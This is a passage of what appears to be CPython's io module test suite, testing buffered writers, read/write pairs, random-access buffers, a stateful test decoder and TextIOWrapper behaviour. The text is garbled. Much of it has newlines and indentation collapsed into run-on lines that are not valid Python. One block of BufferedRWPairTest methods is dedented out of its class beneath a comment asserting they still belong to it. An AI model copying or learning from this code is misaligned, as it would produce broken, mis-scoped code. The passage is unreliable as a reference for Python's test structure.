self.MockRawIO() bufio = self.tp(writer, 8) bufio.writelines(l) bufio.flush() self.assertEqual(b''.join(writer._write_stack), b'abcdef') def test_writelines_error(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) self.assertRaises(TypeError, bufio.writelines, [1, 2, 3]) self.assertRaises(TypeError, bufio.writelines, None) 
self.assertRaises(TypeError, bufio.writelines, 'abc') def test_destructor(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") del bufio support.gc_collect() self.assertEqual(b"abc", writer._write_stack[0]) def test_truncate(self): # Truncate implicitly flushes the buffer. self.addCleanup(support.unlink, support.TESTFN) with self.open(support.TESTFN, self.write_mode, buffering=0) as raw: bufio = self.tp(raw, 8) bufio.write(b"abcdef") self.assertEqual(bufio.truncate(3), 3) self.assertEqual(bufio.tell(), 6) with self.open(support.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.read(), b"abc") def test_truncate_after_write(self): # Ensure that truncate preserves the file position after # writes longer than the buffer size. # Issue: https://bugs.python.org/issue32228 self.addCleanup(support.unlink, support.TESTFN) with self.open(support.TESTFN, "wb") as f: # Fill with some buffer f.write(b'\x00' * 10000) buffer_sizes = [8192, 4096, 200] for buffer_size in buffer_sizes: with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f: f.write(b'\x00' * (buffer_size + 1)) # After write write_pos and write_end are set to 0 f.read(1) # read operation makes sure that pos != raw_pos f.truncate() self.assertEqual(f.tell(), buffer_size + 2) @support.requires_resource('cpu') def test_threads(self): try: # Write out many bytes from many threads and test they were # all flushed. N = 1000 contents = bytes(range(256)) * N sizes = cycle([1, 19]) n = 0 queue = deque() while n < len(contents): size = next(sizes) queue.append(contents[n:n+size]) n += size del contents # We use a real file object because it allows us to # exercise situations where the GIL is released before # writing the buffer to the raw streams. This is in addition # to concurrency issues due to switching threads in the middle # of Python code. 
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] def f(): try: while True: try: s = queue.popleft() except IndexError: return bufio.write(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with threading_helper.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) bufio.close() with self.open(support.TESTFN, "rb") as f: s = f.read() for i in range(256): self.assertEqual(s.count(bytes([i])), N) finally: support.unlink(support.TESTFN) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO() bufio = self.tp(rawio, 5) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) self.assertRaises(OSError, bufio.write, b"abcdef") # Silence destructor error bufio.close = lambda: None def test_max_buffer_size_removal(self): with self.assertRaises(TypeError): self.tp(self.MockRawIO(), 8, 12) def test_write_error_on_close(self): raw = self.MockRawIO() def bad_write(b): raise OSError() raw.write = bad_write b = self.tp(raw) b.write(b'spam') self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) def test_slow_close_from_thread(self): # Issue #31976 rawio = self.SlowFlushRawIO() bufio = self.tp(rawio, 8) t = threading.Thread(target=bufio.close) t.start() rawio.in_flush.wait() self.assertRaises(ValueError, bufio.write, b'spam') self.assertTrue(bufio.closed) t.join() class CBufferedWriterTest(BufferedWriterTest, SizeofTest): tp = io.BufferedWriter @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedWriterTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. 
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                bufio.__init__, rawio, sys.maxsize)

    def test_initialization(self):
        # Invalid buffer sizes must raise, and a failed __init__ must leave
        # the object unusable (write() raises) rather than half-built.
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        self.assertRaises(ValueError, bufio.write, b"def")

    def test_garbage_collection(self):
        # C BufferedWriter objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends into gc.garbage instead
        self.addCleanup(support.unlink, support.TESTFN)
        with support.check_warnings(('', ResourceWarning)):
            rawio = self.FileIO(support.TESTFN, "w+b")
            f = self.tp(rawio)
            f.write(b"123xxx")
            f.x = f  # reference cycle so only the GC can reclaim it
            wr = weakref.ref(f)
            del f
            support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"123xxx")

    def test_args_error(self):
        # Issue #17275: excess positional args must mention the class name.
        with self.assertRaisesRegex(TypeError, "BufferedWriter"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)


class PyBufferedWriterTest(BufferedWriterTest):
    tp = pyio.BufferedWriter


class BufferedRWPairTest(unittest.TestCase):
    # Tests for BufferedRWPair; self.tp is set to the C or Python
    # implementation by the concrete subclasses below.

    def test_constructor(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)

    def test_uninitialized(self):
        # An object created via __new__ without __init__ must fail cleanly
        # on use, and become usable after a late __init__.
        pair = self.tp.__new__(self.tp)
        del pair
        pair = self.tp.__new__(self.tp)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               pair.read, 0)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               pair.write, b'')
        pair.__init__(self.MockRawIO(), self.MockRawIO())
        self.assertEqual(pair.read(0), b'')
        self.assertEqual(pair.write(b''), 0)

    def test_detach(self):
        # BufferedRWPair wraps two streams, so detach() is unsupported.
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertRaises(self.UnsupportedOperation, pair.detach)

    def test_constructor_max_buffer_size_removal(self):
        with self.assertRaises(TypeError):
            self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)

    def test_constructor_with_not_readable(self):
        class NotReadable(MockRawIO):
            def readable(self):
                return False

        self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())

    def test_constructor_with_not_writeable(self):
        class NotWriteable(MockRawIO):
            def writable(self):
                return False

        self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())

    def test_read(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())

        self.assertEqual(pair.read(3), b"abc")
        self.assertEqual(pair.read(1), b"d")
        self.assertEqual(pair.read(), b"ef")
        pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
        self.assertEqual(pair.read(None), b"abc")

    def test_readlines(self):
        pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])

    def test_read1(self):
        # .read1() is delegated to the underlying reader object, so this test
        # can be shallow.
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())

        self.assertEqual(pair.read1(3), b"abc")
        self.assertEqual(pair.read1(), b"def")

    def test_readinto(self):
        for method in ("readinto", "readinto1"):
            with self.subTest(method):
                pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())

                data = byteslike(b'\0' * 5)
                self.assertEqual(getattr(pair, method)(data), 5)
                self.assertEqual(bytes(data), b"abcde")

    def test_write(self):
        w = self.MockRawIO()
        pair = self.tp(self.MockRawIO(), w)

        pair.write(b"abc")
        pair.flush()
        buffer = bytearray(b"def")
        pair.write(buffer)
        buffer[:] = b"***"  # Overwrite our copy of the data
        pair.flush()
        self.assertEqual(w._write_stack, [b"abc", b"def"])

    def test_peek(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())

        self.assertTrue(pair.peek(3).startswith(b"abc"))
        self.assertEqual(pair.read(3), b"abc")

    def test_readable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.readable())

    def test_writeable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.writable())

    def test_seekable(self):
        # BufferedRWPairs are never seekable, even if their readers and writers
        # are.
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.seekable())

    # .flush() is delegated to the underlying writer object and has been
    # tested in the test_write method.
# NOTE(review): the methods below belong to BufferedRWPairTest, whose class
# header is defined earlier in this file.

def test_close_and_closed(self):
    """Closing the pair flips its `closed` flag."""
    pair = self.tp(self.MockRawIO(), self.MockRawIO())
    self.assertFalse(pair.closed)
    pair.close()
    self.assertTrue(pair.closed)

def test_reader_close_error_on_close(self):
    """If the reader's close() raises, the error propagates from pair.close()
    but the writer is still closed and the pair is marked closed."""
    def reader_close():
        reader_non_existing  # deliberately undefined -> NameError on close
    reader = self.MockRawIO()
    reader.close = reader_close
    writer = self.MockRawIO()
    pair = self.tp(reader, writer)
    with self.assertRaises(NameError) as err:
        pair.close()
    self.assertIn('reader_non_existing', str(err.exception))
    self.assertTrue(pair.closed)
    self.assertFalse(reader.closed)
    self.assertTrue(writer.closed)

    # Silence destructor error
    reader.close = lambda: None

def test_writer_close_error_on_close(self):
    """If the writer's close() raises, the error propagates, the reader is
    closed first, and the pair is NOT marked closed."""
    def writer_close():
        writer_non_existing  # deliberately undefined -> NameError on close
    reader = self.MockRawIO()
    writer = self.MockRawIO()
    writer.close = writer_close
    pair = self.tp(reader, writer)
    with self.assertRaises(NameError) as err:
        pair.close()
    self.assertIn('writer_non_existing', str(err.exception))
    self.assertFalse(pair.closed)
    self.assertTrue(reader.closed)
    self.assertFalse(writer.closed)

    # Silence destructor error
    writer.close = lambda: None
    writer = None

    # Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
    with support.catch_unraisable_exception():
        # Ignore BufferedRWPair unraisable exception
        with support.catch_unraisable_exception():
            pair = None
            support.gc_collect()
        support.gc_collect()

def test_reader_writer_close_error_on_close(self):
    """If both close() calls raise, the reader's error propagates with the
    writer's error chained as its __context__; nothing is marked closed."""
    def reader_close():
        reader_non_existing  # deliberately undefined -> NameError on close
    def writer_close():
        writer_non_existing  # deliberately undefined -> NameError on close
    reader = self.MockRawIO()
    reader.close = reader_close
    writer = self.MockRawIO()
    writer.close = writer_close
    pair = self.tp(reader, writer)
    with self.assertRaises(NameError) as err:
        pair.close()
    self.assertIn('reader_non_existing', str(err.exception))
    self.assertIsInstance(err.exception.__context__, NameError)
    self.assertIn('writer_non_existing', str(err.exception.__context__))
    self.assertFalse(pair.closed)
    self.assertFalse(reader.closed)
    self.assertFalse(writer.closed)

    # Silence destructor error
    reader.close = lambda: None
    writer.close = lambda: None

def test_isatty(self):
    """pair.isatty() is true if either underlying stream reports a tty."""
    class SelectableIsAtty(MockRawIO):
        def __init__(self, isatty):
            MockRawIO.__init__(self)
            self._isatty = isatty
        def isatty(self):
            return self._isatty

    pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
    self.assertFalse(pair.isatty())

    pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
    self.assertTrue(pair.isatty())

    pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
    self.assertTrue(pair.isatty())

    pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
    self.assertTrue(pair.isatty())

def test_weakref_clearing(self):
    """Dropping a weakly-referenced pair must not crash the interpreter."""
    brw = self.tp(self.MockRawIO(), self.MockRawIO())
    ref = weakref.ref(brw)
    brw = None
    ref = None # Shouldn't segfault.

class CBufferedRWPairTest(BufferedRWPairTest):
    # Run the shared BufferedRWPairTest suite against the C implementation.
    tp = io.BufferedRWPair

class PyBufferedRWPairTest(BufferedRWPairTest):
    # Run the shared BufferedRWPairTest suite against the pure-Python implementation.
    tp = pyio.BufferedRWPair


class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
    """Tests for read/write buffered streams; inherits the reader and writer
    suites and adds interleaved read/write/seek behavior."""
    read_mode = "rb+"
    write_mode = "wb+"

    def test_constructor(self):
        BufferedReaderTest.test_constructor(self)
        BufferedWriterTest.test_constructor(self)

    def test_uninitialized(self):
        BufferedReaderTest.test_uninitialized(self)
        BufferedWriterTest.test_uninitialized(self)

    def test_read_and_write(self):
        raw = self.MockRawIO((b"asdf", b"ghjk"))
        rw = self.tp(raw, 8)

        self.assertEqual(b"as", rw.read(2))
        rw.write(b"ddd")
        rw.write(b"eee")
        self.assertFalse(raw._write_stack) # Buffer writes
        self.assertEqual(b"ghjk", rw.read())
        self.assertEqual(b"dddeee", raw._write_stack[0])

    def test_seek_and_tell(self):
        raw = self.BytesIO(b"asdfghjkl")
        rw = self.tp(raw)

        self.assertEqual(b"as", rw.read(2))
        self.assertEqual(2, rw.tell())
        rw.seek(0, 0)
        self.assertEqual(b"asdf", rw.read(4))

        rw.write(b"123f")
        rw.seek(0, 0)
        self.assertEqual(b"asdf123fl", rw.read())
        self.assertEqual(9, rw.tell())
        rw.seek(-4, 2)
        self.assertEqual(5, rw.tell())
        rw.seek(2, 1)
        self.assertEqual(7, rw.tell())
        self.assertEqual(b"fl", rw.read(11))
        rw.flush()
        self.assertEqual(b"asdf123fl", raw.getvalue())

        # seek() only accepts integer offsets.
        self.assertRaises(TypeError, rw.seek, 0.0)

    def check_flush_and_read(self, read_func):
        """Shared driver: interleave reads (via read_func) with buffered
        writes and flushes, checking positions and data at each step."""
        raw = self.BytesIO(b"abcdefghi")
        bufio = self.tp(raw)

        self.assertEqual(b"ab", read_func(bufio, 2))
        bufio.write(b"12")
        self.assertEqual(b"ef", read_func(bufio, 2))
        self.assertEqual(6, bufio.tell())
        bufio.flush()
        self.assertEqual(6, bufio.tell())
        self.assertEqual(b"ghi", read_func(bufio))
        raw.seek(0, 0)
        raw.write(b"XYZ")
        # flush() resets the read buffer
        bufio.flush()
        bufio.seek(0, 0)
        self.assertEqual(b"XYZ", read_func(bufio, 3))

    def test_flush_and_read(self):
        self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))

    def test_flush_and_readinto(self):
        def _readinto(bufio, n=-1):
            b = bytearray(n if n >= 0 else 9999)
            n = bufio.readinto(b)
            return bytes(b[:n])
        self.check_flush_and_read(_readinto)

    def test_flush_and_peek(self):
        def _peek(bufio, n=-1):
            # This relies on the fact that the buffer can contain the whole
            # raw stream, otherwise peek() can return less.
            b = bufio.peek(n)
            if n != -1:
                b = b[:n]
            bufio.seek(len(b), 1)
            return b
        self.check_flush_and_read(_peek)

    def test_flush_and_write(self):
        raw = self.BytesIO(b"abcdefghi")
        bufio = self.tp(raw)

        bufio.write(b"123")
        bufio.flush()
        bufio.write(b"45")
        bufio.flush()
        bufio.seek(0, 0)
        self.assertEqual(b"12345fghi", raw.getvalue())
        self.assertEqual(b"12345fghi", bufio.read())

    def test_threads(self):
        BufferedReaderTest.test_threads(self)
        BufferedWriterTest.test_threads(self)

    def test_writes_and_peek(self):
        def _peek(bufio):
            bufio.peek(1)
        self.check_writes(_peek)
        def _peek(bufio):
            pos = bufio.tell()
            bufio.seek(-1, 1)
            bufio.peek(1)
            bufio.seek(pos, 0)
        self.check_writes(_peek)

    def test_writes_and_reads(self):
        def _read(bufio):
            bufio.seek(-1, 1)
            bufio.read(1)
        self.check_writes(_read)

    def test_writes_and_read1s(self):
        def _read1(bufio):
            bufio.seek(-1, 1)
            bufio.read1(1)
        self.check_writes(_read1)

    def test_writes_and_readintos(self):
        def _read(bufio):
            bufio.seek(-1, 1)
            bufio.readinto(bytearray(1))
        self.check_writes(_read)

    def test_write_after_readahead(self):
        # Issue #6629: writing after the buffer was filled by readahead should
        # first rewind the raw stream.
        for overwrite_size in [1, 5]:
            raw = self.BytesIO(b"A" * 10)
            bufio = self.tp(raw, 4)
            # Trigger readahead
            self.assertEqual(bufio.read(1), b"A")
            self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if it needs so
            bufio.write(b"B" * overwrite_size)
            self.assertEqual(bufio.tell(), overwrite_size + 1)
            # If the write size was smaller than the buffer size, flush() and
            # check that rewind happens.
            bufio.flush()
            self.assertEqual(bufio.tell(), overwrite_size + 1)
            s = raw.getvalue()
            self.assertEqual(s,
                b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))

    def test_write_rewind_write(self):
        # Various combinations of reading / writing / seeking backwards / writing again
        def mutate(bufio, pos1, pos2):
            assert pos2 >= pos1
            # Fill the buffer
            bufio.seek(pos1)
            bufio.read(pos2 - pos1)
            bufio.write(b'\x02')
            # This writes earlier than the previous write, but still inside
            # the buffer.
            bufio.seek(pos1)
            bufio.write(b'\x01')

        b = b"\x80\x81\x82\x83\x84"
        # Exhaustively try every (pos1, pos2) pair over the 5-byte payload.
        for i in range(0, len(b)):
            for j in range(i, len(b)):
                raw = self.BytesIO(b)
                bufio = self.tp(raw, 100)
                mutate(bufio, i, j)
                bufio.flush()
                expected = bytearray(b)
                expected[j] = 2
                expected[i] = 1
                self.assertEqual(raw.getvalue(), expected,
                                 "failed result for i=%d, j=%d" % (i, j))

    def test_truncate_after_read_or_write(self):
        raw = self.BytesIO(b"A" * 10)
        bufio = self.tp(raw, 100)
        self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
        self.assertEqual(bufio.truncate(), 2)
        self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
        self.assertEqual(bufio.truncate(), 4)

    def test_misbehaved_io(self):
        BufferedReaderTest.test_misbehaved_io(self)
        BufferedWriterTest.test_misbehaved_io(self)

    def test_interleaved_read_write(self):
        # Test for issue #12213
        with self.BytesIO(b'abcdefgh') as raw:
            with self.tp(raw, 100) as f:
                f.write(b"1")
                self.assertEqual(f.read(1), b'b')
                f.write(b'2')
                self.assertEqual(f.read1(1), b'd')
                f.write(b'3')
                buf = bytearray(1)
                f.readinto(buf)
                self.assertEqual(buf, b'f')
                f.write(b'4')
                self.assertEqual(f.peek(1), b'h')
                f.flush()
                self.assertEqual(raw.getvalue(), b'1b2d3f4h')

        with self.BytesIO(b'abc') as raw:
            with self.tp(raw, 100) as f:
                self.assertEqual(f.read(1), b'a')
                f.write(b"2")
                self.assertEqual(f.read(1), b'c')
                f.flush()
                self.assertEqual(raw.getvalue(), b'a2c')

    def test_interleaved_readline_write(self):
        with self.BytesIO(b'ab\ncdef\ng\n') as raw:
            with self.tp(raw) as f:
                f.write(b'1')
                self.assertEqual(f.readline(), b'b\n')
                f.write(b'2')
                self.assertEqual(f.readline(), b'def\n')
                f.write(b'3')
                self.assertEqual(f.readline(), b'\n')
                f.flush()
                self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')

    # You can't construct a BufferedRandom over a non-seekable stream.
    test_unseekable = None

    # writable() returns True, so there's no point to test it over
    # a writable stream.
test_truncate_on_read_only = None class CBufferedRandomTest(BufferedRandomTest, SizeofTest): tp = io.BufferedRandom @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedRandomTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_garbage_collection(self): CBufferedReaderTest.test_garbage_collection(self) CBufferedWriterTest.test_garbage_collection(self) def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedRandom"): self.tp(io.BytesIO(), 1024, 1024, 1024) class PyBufferedRandomTest(BufferedRandomTest): tp = pyio.BufferedRandom # To fully exercise seek/tell, the StatefulIncrementalDecoder has these # properties: # - A single output character can correspond to many bytes of input. # - The number of input bytes to complete the character can be # undetermined until the last input byte is received. # - The number of input bytes can vary depending on previous input. # - A single input byte can correspond to many characters of output. # - The number of output characters can be undetermined until the # last input byte is received. # - The number of output characters can vary depending on previous input. class StatefulIncrementalDecoder(codecs.IncrementalDecoder): """ For testing seek/tell behavior with a stateful, buffering decoder. Input is a sequence of words. Words may be fixed-length (length set by input) or variable-length (period-terminated). In variable-length mode, extra periods are ignored. Possible words are: - 'i' followed by a number sets the input length, I (maximum 99). When I is set to 0, words are space-terminated. 
- 'o' followed by a number sets the output length, O (maximum 99). - Any other word is converted into a word followed by a period on the output. The output word consists of the input word truncated or padded out with hyphens to make its length equal to O. If O is 0, the word is output verbatim without truncating or padding. I and O are initially set to 1. When I changes, any buffered input is re-scanned according to the new I. EOF also terminates the last word. """ def __init__(self, errors='strict'): codecs.IncrementalDecoder.__init__(self, errors) self.reset() def __repr__(self): return '<SID %x>' % id(self) def reset(self): self.i = 1 self.o = 1 self.buffer = bytearray() def getstate(self): i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset() return bytes(self.buffer), i*100 + o def setstate(self, state): buffer, io = state self.buffer = bytearray(buffer) i, o = divmod(io, 100) self.i, self.o = i ^ 1, o ^ 1 def decode(self, input, final=False): output = '' for b in input: if self.i == 0: # variable-length, terminated with period if b == ord('.'): if self.buffer: output += self.process_word() else: self.buffer.append(b) else: # fixed-length, terminate after self.i bytes self.buffer.append(b) if len(self.buffer) == self.i: output += self.process_word() if final and self.buffer: # EOF terminates the last word output += self.process_word() return output def process_word(self): output = '' if self.buffer[0] == ord('i'): self.i = min(99, int(self.buffer[1:] or 0)) # set input length elif self.buffer[0] == ord('o'): self.o = min(99, int(self.buffer[1:] or 0)) # set output length else: output = self.buffer.decode('ascii') if len(output) < self.o: output += '-'*self.o # pad out with hyphens if self.o: output = output[:self.o] # truncate to output length output += '.' 
self.buffer = bytearray() return output codecEnabled = False @classmethod def lookupTestDecoder(cls, name): if cls.codecEnabled and name == 'test_decoder': latin1 = codecs.lookup('latin-1') return codecs.CodecInfo( name='test_decoder', encode=latin1.encode, decode=None, incrementalencoder=None, streamreader=None, streamwriter=None, incrementaldecoder=cls) # Register the previous decoder for testing. # Disabled by default, tests will enable it. codecs.register(StatefulIncrementalDecoder.lookupTestDecoder) class StatefulIncrementalDecoderTest(unittest.TestCase): """ Make sure the StatefulIncrementalDecoder actually works. """ test_cases = [ # I=1, O=1 (fixed-length input == fixed-length output) (b'abcd', False, 'a.b.c.d.'), # I=0, O=0 (variable-length input, variable-length output) (b'oiabcd', True, 'abcd.'), # I=0, O=0 (should ignore extra periods) (b'oi...abcd...', True, 'abcd.'), # I=0, O=6 (variable-length input, fixed-length output) (b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'), # I=2, O=6 (fixed-length input < fixed-length output) (b'i.i2.o6xyz', True, 'xy----.z-----.'), # I=6, O=3 (fixed-length input > fixed-length output) (b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'), # I=0, then 3; O=29, then 15 (with longer output) (b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True, 'a----------------------------.' + 'b----------------------------.' + 'cde--------------------------.' + 'abcdefghijabcde.' + 'a.b------------.' + '.c.------------.' + 'd.e------------.' + 'k--------------.' + 'l--------------.' + 'm--------------.') ] def test_decoder(self): # Try a few one-shot test cases. for input, eof, output in self.test_cases: d = StatefulIncrementalDecoder() self.assertEqual(d.decode(input, eof), output) # Also test an unfinished decode, followed by forcing EOF. 
d = StatefulIncrementalDecoder() self.assertEqual(d.decode(b'oiabcd'), '') self.assertEqual(d.decode(b'', 1), 'abcd.') class TextIOWrapperTest(unittest.TestCase): def setUp(self): self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n" self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii") support.unlink(support.TESTFN) def tearDown(self): support.unlink(support.TESTFN) def test_constructor(self): r = self.BytesIO(b"\xc3\xa9\n\n") b = self.BufferedReader(r, 1000) t = self.TextIOWrapper(b) t.__init__(b, encoding="latin-1", newline="\r\n") self.assertEqual(t.encoding, "latin-1") self.assertEqual(t.line_buffering, False) t.__init__(b, encoding="utf-8", line_buffering=True) self.assertEqual(t.encoding, "utf-8") self.assertEqual(t.line_buffering, True) self.assertEqual("\xe9\n", t.readline()) self.assertRaises(TypeError, t.__init__, b, newline=42) self.assertRaises(ValueError, t.__init__, b, newline='xyzzy') def test_uninitialized(self): t = self.TextIOWrapper.__new__(self.TextIOWrapper) del t t = self.TextIOWrapper.__new__(self.TextIOWrapper) self.assertRaises(Exception, repr, t) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', t.read, 0) t.__init__(self.MockRawIO()) self.assertEqual(t.read(0), '') def test_non_text_encoding_codecs_are_rejected(self): # Ensure the constructor complains if passed a codec that isn't # marked as a text encoding # http://bugs.python.org/issue20404 r = self.BytesIO() b = self.BufferedWriter(r) with self.assertRaisesRegex(LookupError, "is not a text encoding"): self.TextIOWrapper(b, encoding="hex") def test_detach(self): r = self.BytesIO() b = self.BufferedWriter(r) t = self.TextIOWrapper(b) self.assertIs(t.detach(), b) t = self.TextIOWrapper(b, encoding="ascii") t.write("howdy") self.assertFalse(r.getvalue()) t.detach() self.assertEqual(r.getvalue(), b"howdy") self.assertRaises(ValueError, t.detach) # Operations independent of the detached stream should still work repr(t) self.assertEqual(t.encoding, 
"ascii") self.assertEqual(t.errors, "strict") self.assertFalse(t.line_buffering) self.assertFalse(t.write_through) def test_repr(self): raw = self.BytesIO("hello".encode("utf-8")) b = self.BufferedReader(raw) t = self.TextIOWrapper(b, encoding="utf-8") modname = self.TextIOWrapper.__module__ self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname) raw.name = "dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname) t.mode = "r" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname) raw.name = b"dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname) t.buffer.detach() repr(t) # Should not raise an exception def test_recursive_repr(self): # Issue #25455 raw = self.BytesIO() t = self.TextIOWrapper(raw) with support.swap_attr(raw, 'name', t): try: repr(t) # Should not crash except RuntimeError: pass def test_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=True) t.write("X") self.assertEqual(r.getvalue(), b"") # No flush happened t.write("Y\nZ") self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed t.write("A\rB") self.assertEqual(r.getvalue(), b"XY\nZA\rB") def test_reconfigure_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=False) t.write("AB\nC") self.assertEqual(r.getvalue(), b"") t.reconfigure(line_buffering=True) # implicit flush self.assertEqual(r.getvalue(), b"AB\nC") t.write("DEF\nG") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.write("H") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.reconfigure(line_buffering=False) # implicit flush self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") t.write("IJ") self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") # Keeping default value t.reconfigure() t.reconfigure(line_buffering=None) 
self.assertEqual(t.line_buffering, False) t.reconfigure(line_buffering=True) t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, True) @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_default_encoding(self): old_environ = dict(os.environ) try: # try to get a user preferred encoding different than the current # locale encoding to check that TextIOWrapper() uses the current # locale encoding and not the user preferred encoding for key in ('LC_ALL', 'LANG', 'LC_CTYPE'): if key in os.environ: del os.environ[key] current_locale_encoding = locale.getpreferredencoding(False) b = self.BytesIO() t = self.TextIOWrapper(b) self.assertEqual(t.encoding, current_locale_encoding) finally: os.environ.clear() os.environ.update(old_environ) @support.cpython_only @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_device_encoding(self): # Issue 15989 import _testcapi b = self.BytesIO() b.fileno = lambda: _testcapi.INT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) b.fileno = lambda: _testcapi.UINT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) def test_encoding(self): # Check the encoding attribute is always set, and valid b = self.BytesIO() t = self.TextIOWrapper(b, encoding="utf-8") self.assertEqual(t.encoding, "utf-8") t = self.TextIOWrapper(b) self.assertIsNotNone(t.encoding) codecs.lookup(t.encoding) def test_encoding_errors_reading(self): # (1) default b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.read) # (2) explicit strict b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.read) # (3) ignore b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="ignore") self.assertEqual(t.read(), "abc\n\n") # (4) replace b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="replace") 
